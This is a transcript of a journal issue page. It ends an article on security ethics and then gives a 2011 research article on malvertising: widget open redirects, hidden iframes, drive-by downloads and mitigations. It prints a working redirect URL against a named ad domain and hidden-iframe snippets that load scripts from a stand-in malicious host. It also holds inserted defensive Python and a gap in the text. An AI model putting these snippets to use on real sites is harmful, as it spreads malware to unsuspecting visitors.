Transcript of "Malvertising - Exploiting Web Advertising | Elsevier Computer Fraud and Security Journal"
which he describes as "a bit basic", will make in and of themselves. While he says that the "unification of views" from disparate industry bodies can only be a good thing, he points out that their value to the industry is likely to remain limited "until and unless businesses [rather than individual practitioners] are made fully aware of their existence and accept and embrace them".

"It's a good starting point if only for debate such as this," he says, "but it will be interesting to see the status of the principles in a year's time."

Ethics project

Meanwhile, another potential step on the road to professionalisation is the creation of an initiative entitled the Information Security Ethics Project, which is sponsored by and housed within the UK's Institute of Information Security Professionals (IISP). The idea behind the project came from the Institute's general counsel, Robert Carolina, who is also a senior visiting fellow at Royal Holloway University's information security group, where he teaches in its information security MSc programme.

In early 2009, Carolina wrote an article for Computer Weekly about the legality – or otherwise – of the actions of the BBC's Click TV programme team when it created its own botnet for educational purposes by commandeering more than 21,000 computers around the world. Carolina canvassed the opinions of a number of information security practitioners as to whether they considered the move right or wrong. The responses, which ranged from "it's absolutely appalling and law enforcement should throw the book at them" to "they deserve to get an award" – which, incidentally, they later did – prompted him to explore what ethical guidance was currently available, most of which he found unhelpful.

As a result, as of early February this year, Carolina kicked off the first in a series of ethics workshops, made up of no more than 25 IISP members. "This is an area where people are crying out for guidance, especially in the private sector," he says. "We want practitioners to have better information so that they feel less exposed and better informed to make hard decisions."

Things are changing

The half-day discussion centred on a series of hypothetical case studies that were used to debate the right and wrong ways to respond in each scenario and, most importantly, why. The aim was to look for points of commonality and difference in the individuals' beliefs and approaches and to use those areas where opinion diverged as the basis for further discussion.

The next step will be to host an ongoing series of workshops over the next 12 months or so and to circulate reports based on the outcomes to members of the working group, although other individuals will be invited to join as appropriate. "If this gains traction and popular support, we might be able to start abstracting out basic principles to describe what ethical practices are and maybe write them down as a rule set," Carolina says. "But if we do that, it will only be published with highlighted case studies as you have to have examples and context. In my professional opinion, without that, it's not much value."

While such initiatives are, unfortunately, still rather fragmented in nature, what they would appear to suggest is that the information security industry is slowly starting to move down the path of becoming more professionalised. As Gillespie concludes: "Things are changing. There are lots of pockets of work being done and, while they're not consistent or global, you can see a day when the industry will get there – although it's a long road yet."

About the author

Cath Everett is a freelance journalist who has been writing about business and technology issues since 1992. Her special areas of focus include information security, HR/management and skills issues, marketing and high-end software.

Malvertising – exploiting web advertising

Aditya K Sood, Richard J Enbody, Michigan State University
Computer Fraud & Security, April 2011

Online advertisements provide a convenient platform for spreading malware. Since ads provide a significant portion of revenue on the web, significant effort is put into attracting users to them. Malicious agents take advantage of this skillful attraction and then redirect users to malicious sites that serve malware.

Search engines' intimate tie-in with advertising also assists malicious agents: significant effort goes into attracting users to particular sites from which users can be redirected. Of particular use to malicious agents is that redirection is built into online advertising so the malicious user only needs to co-opt a redirection that is taking place. As a bonus, the user expects a redirection to take place, so
the redirection to a malicious site is less of a red flag.

Another feature of online advertising that can be co-opted by malicious agents is the dynamic delivery of ads. A standard approach is to provide HTML code snippets that are used in conjunction with normal websites in order to embed advertisements. For example, Doubleclick.net provides millions of ads that are served to different domains as dynamic content – that is, the content of advertisements can change dynamically based on user or content characteristics. Service Level Agreements (SLA) exist between ad distributor and website to define appropriate content, but they are neither designed for nor appropriate for applying effective security. In particular, it is hard to determine the integrity of content that is shared among different domains across the web.

The result is that online marketing has opened up new avenues for profit generation while at the same time providing a convenient platform for malware delivery. Malvertising growth is being assisted by the following:

• Malicious agents can register nearly any domain and can use it as a storage base for malware in order to conduct drive-by-download attacks by redirecting users to their malicious domains.1 Generally, these types of domains do not comply with any types of security or privacy standards.
• Malicious agents can use different modes of malvertising infections in order to redirect traffic from malvertisements that are distributed across the World Wide Web. When a user clicks on a malvertisement, the traffic is redirected towards a malicious domain rather than the legitimate one.
• Generally, no verification check can be imposed on advertisements to detect whether the redirect occurs appropriately or not. This lack of verification results from the nature of the web-advertising model that makes it difficult for a publisher to scrutinise web traffic related to ad delivery.
• Attackers can also tamper with sponsored links to distribute malicious executables directly into the system as a part of drive-by-download infection. Internet Explorer has been a popular target because of both its popularity and its ability to run custom exploits through ActiveX controls.

The irony is that advertisers pay the publishers for the advertisements while the attackers exploit those same ads to spread malware.

Malvertising modes

Most of the web malware is triggered through web injections to exploit the vulnerabilities in web software and domains. Different modes of infections are used for injecting malicious advertisements in vulnerable domains. To appreciate the severity and prevalence of this class of attack, the Open Web Application Security Project (OWASP) recently placed unvalidated redirects and forwards in its 2010 'top 10' list.2

Figure 1: Registering a widget on a vulnerable advertising domain.

Malvertising with malicious widgets and redirection

The advent of Web 2.0 popularised widgets for use in advertising and traffic redirection.3 However, flaws in the design of some web widgets pose high risks to domains using those widgets for advertising.4 As mentioned above, the redirection can be co-opted by malicious users to redirect traffic to malicious sites.
For example, we detected a widget vulnerability in a popular news publisher website. The normal procedure is for a user to register, which allows the publisher to render news from various popular channels and embed them into the user's websites and blogs. However, because of flaws in the publisher's system, it's possible to redirect traffic.

In order to install the widget, the publishing domain requires certain steps to be performed by a user to facilitate the ability of the widget to include third-party content. Specifically:

• The widget can only be installed after registration. The user selects the widget code based on the target platform – such as blogger, MySpace etc – in which the widget is to be installed.
• Once the registration is complete, the publisher requires the user to log in to his or her website or blog so that widget installation can be completed. After installation, the publisher starts sending news and advertisements to the registered user website.
• After the widget is embedded in the user's site, the user is able to receive random content from various content providers through a vulnerable advertising domain that acts as an intermediate service provider.

Figure 2: Installed widget.

For advertising purposes, the vulnerable publishing domain uses redirection links in order to advertise on the publisher's website. However, web traffic can be easily redirected from where the widget is installed to any domain. This shows that inclusion of the widget in any random domain can result in traffic redirection from a vulnerable publisher's website through advertising links. The attacker can exploit this scenario by performing three steps:

Step 1: The attacker registers as a legitimate user (in order to get a widget for inclusion in some domain) as shown in Figure 1. The widget is included in the same domain as shown in Figure 2.

Step 2: The attacker can activate the apparently dead vulnerability through hyperlinks by activating the URL from the vulnerable publishing domain as follows, where 'outbrain.com' is a vulnerable advertising domain and 'xsstestingblog' is a blog that serves malware:

http://outbrain.com/most-viewed.action?sourceUrl=http://www.xsstestingblog.blogspot.com

Step 3: Users who go to the widget thinking that they are entering the publisher's site find themselves redirected to the attacker's site. A successful attack can be seen as a response request mechanism in Figure 3.

This attack is the outcome of a design bug in the widget implementation. Attackers can exploit this scenario by generating malicious advertisements (using the publisher's name) that are embedded with redirected URLs which exploit the design bug in the vulnerable publishing domain in order to execute redirection towards the malicious domain. This shows how a vulnerable advertising widget can be subverted by an attacker.

Hidden iframes are one way for attackers to hide the objects that are used for spreading malware. The concept of hidden infection is not new, but here we show a different variation. The HTTP specification includes the iframe to embed one web page into another. Iframes can be used to load dynamic content for advertising. This functionality of iframes can be exploited to trigger infections. Iframes are used extensively in order to bypass Same Origin Policy (SOP) and launch a Cross Domain Attack (CDA).5,6 Attackers can easily embed hidden iframes that serve malvertisements in order to spread malware while interacting with legitimate users. Usually, iframes are exploited using the following procedures for running malicious code:

1. Scripts in iframes are allowed to execute in the context of the browser process (the more powerful the context, the greater the vulnerability that can be exploited).
2. There is no specific security restriction on ActiveX object usage.
3. Browser redirection can be done easily through iframes.
4. Access to local objects is not restricted completely.

The hidden iframes used for malvertising are constructed as follows:

<iframe src="http://www.malicious.com/mal_ad.js" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

<iframe src="http://www.malicious.com/software_ad.js" width=0 height=0></iframe>
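The open redirect in the widget above (a sourceUrl parameter forwarded without any check) can be closed on the publisher's side by accepting only targets on an allowlist. This is an added example, not code from the article or from the publisher it describes; the allowed host names and the request URLs are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed allowlist: the only hosts this publisher's widget may forward to.
ALLOWED_HOSTS = {"www.example-news.com", "cdn.example-news.com"}


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Accept only a same-site path ('/...') or an absolute http(s) URL whose
    host is exactly on the allowlist; anything else is treated as an
    open-redirect attempt and rejected."""
    if not target or any(c in target for c in "\r\n\x00"):
        return False                          # empty or header-injection junk
    parts = urlsplit(target.strip())
    if parts.scheme == "" and parts.netloc == "":
        # Relative path: one leading '/' is fine; '//host' and '/\host'
        # are protocol-relative forms browsers treat as another site.
        return target.startswith("/") and not target.startswith(("//", "/\\"))
    if parts.scheme not in ("http", "https"):
        return False                          # javascript:, data:, ftp: ...
    # .hostname drops any 'user:pass@' prefix, so a target such as
    # http://www.example-news.com@evil.example resolves to evil.example
    host = (parts.hostname or "").lower()
    return host in allowed_hosts


def resolve_widget_redirect(request_url: str, fallback: str = "/") -> str:
    """Read the sourceUrl parameter from a widget request like the one in the
    article and return where the publisher should actually send the user."""
    query = parse_qs(urlsplit(request_url).query)
    target = query.get("sourceUrl", [""])[0]
    return target if is_safe_redirect(target) else fallback


if __name__ == "__main__":
    bad = ("http://outbrain.com/most-viewed.action"
           "?sourceUrl=http://www.xsstestingblog.blogspot.com")
    print(resolve_widget_redirect(bad))   # prints "/" : the blog is refused
```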
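A publisher reviewing ad creatives can flag the hidden-iframe pattern shown above before the creative is served: frames sized 0 or 1 pixel, or styled out of sight. This is an added example, not code from the article; the sample creative and the host names in it are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
import re

# Constructed sample creative: one visible 300x250 ad frame plus two hidden
# iframes shaped like the ones shown in the text.
SAMPLE_CREATIVE = """
<div class="ad-slot">
  <iframe src="http://ads.publisher.example/banner.html" width="300" height="250"></iframe>
  <iframe src="http://www.malicious.com/mal_ad.js" width=1 height=1
          style="visibility:hidden;position:absolute"></iframe>
  <iframe src="http://www.malicious.com/software_ad.js" width=0 height=0></iframe>
</div>
"""

# Inline style tricks that keep a frame out of sight: hidden, not rendered,
# or pushed off-screen with a negative offset.
HIDDEN_STYLE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|(?:left|top)\s*:\s*-\d+", re.I)


def _tiny(value):
    """True for a width/height attribute of 0 or 1 pixel."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1


class HiddenIframeScanner(HTMLParser):
    """Collects (host, src, reasons) for every iframe that is tiny or hidden."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = []
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("tiny")
        if HIDDEN_STYLE.search(a.get("style") or ""):
            reasons.append("hidden-style")
        if reasons:
            src = a.get("src") or ""
            self.findings.append((urlsplit(src).hostname or "", src, reasons))


def scan_creative(html):
    """Parse an ad creative and return the list of suspicious iframes."""
    scanner = HiddenIframeScanner()
    scanner.feed(html)
    return scanner.findings
```

Run over the sample creative, the scanner reports both frames pointing at www.malicious.com and leaves the visible publisher frame alone; the host in each finding is what a blocklist or reputation lookup would then be checked against.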
• Attackers update the database with malicious iframes by exploiting SQL injections in order to trigger persistent infections.
• Attackers compromise the shared hosting server and use automated scripts to render malicious code on the main web page of different hosts.

When a user visits a specific website, malicious banners are displayed along with dynamic content. Click on the banner and the user is infected, or simply displaying the banner can lead to infection. This trick can be used in conjunction with SEO poisoning in which an attacker coerces a search engine to visit malicious domains or hijacked websites that display malicious banners.

Figure 5: WMV file is spreading malicious VbScript file.

Solutions

• The design of web applications and widgets should be thoroughly verified before allowing their use in a production environment. The widget should be installed with appropriate access controls in order to avoid any rogue actions.
• The interface communication channel between an installed widget and a parent website should be monitored to catch the traffic redirection. Generally, the main website should not allow redirection in an open manner without restricted control.
• Appropriate configuration should be used in shared hosting environments. The servers should be audited regularly in order to detect any vulnerable hosts.
• A live malware monitoring system should be used for dedicated and shared hosting servers in order to trace malware infections at inception.
• Systems should be updated with the latest software and patches.

Conclusion

We've covered the essential dynamics of malvertising and the attack strategies used to distribute malicious advertisements across domains. Malvertisements are becoming one of the main sources of spreading web malware. One reason for their popularity is a dearth of appropriate security procedures for content sharing. For example, merely signing an SLA does not ensure security and integrity in a shared network. There is a pressing need for rigorous security policies and procedures to curb the risk of this type of infection. History indicates that it is impossible to get rid of malware infections completely, but continuous efforts can contribute towards enhancing the security of our networks.

About the authors

Aditya K Sood is a security researcher, consultant and PhD candidate at Michigan State University. He has worked in the security domain for Armorize, COSEINC and KPMG and founded SecNiche Security. He has been an active speaker at conferences such as RSA, Toorcon, Hacker Halted, TRISC, EuSecwest, XCON, OWASP AppSec, CERT-IN and has written content for HITB Ezine, ISSA, ISACA, Elsevier, Hakin9 and Usenix Login.

Dr Richard Enbody is an Associate Professor in the Department of Computer Science and Engineering, Michigan State University. He joined the faculty in 1987 after earning his PhD in Computer Science from the University of Minnesota. His research interests are in computer security, computer architecture, web-based distance education and parallel processing. He has two patents pending on hardware buffer-overflow protection, which will prevent most computer worms and viruses. He recently co-authored a CS1 Python book, The Practice of Computing using Python.

Resources

• Polychronakis, Michalis; Mavrommatis, Panayiotis; Provos, Niels. 'Ghost Turns Zombie: Exploring the Life Cycle of Web-based Malware'. Accessed Mar 2011. <http://www.usenix.org/event/leet08/tech/full_papers/polychronakis/polychronakis.pdf>.
• Provos, Niels; McNamee, Dean; Mavrommatis, Panayiotis; Wang, Ke; Modadugu, Nagendra. 'The Ghost in the Browser: Analysis of Web-based Malware'. Accessed Mar 2011. <http://www.usenix.org/event/hotbots07/tech/full_papers/provos/provos.pdf>.
• Ford, Sean; Cova, Marco; Kruegel, Christopher; Vigna, Giovanni. 'Analyzing and Detecting Malicious Flash Advertisements'. Accessed Mar 2011. <http://www.cs.ucsb.edu/~chris/research/doc/acsac09_flash.pdf>.
• 'Some 1.3 million malicious ads served daily'. SC Magazine, 18 May 2010. Accessed Mar 2011. <http://www.scmagazineus.com/report-some-13-million-malicious-ads-served-daily/article/170414/>.
• 'Pay Per Click'. Wikipedia. Accessed Mar 2011. <http://en.wikipedia.org/wiki/Pay_per_click>.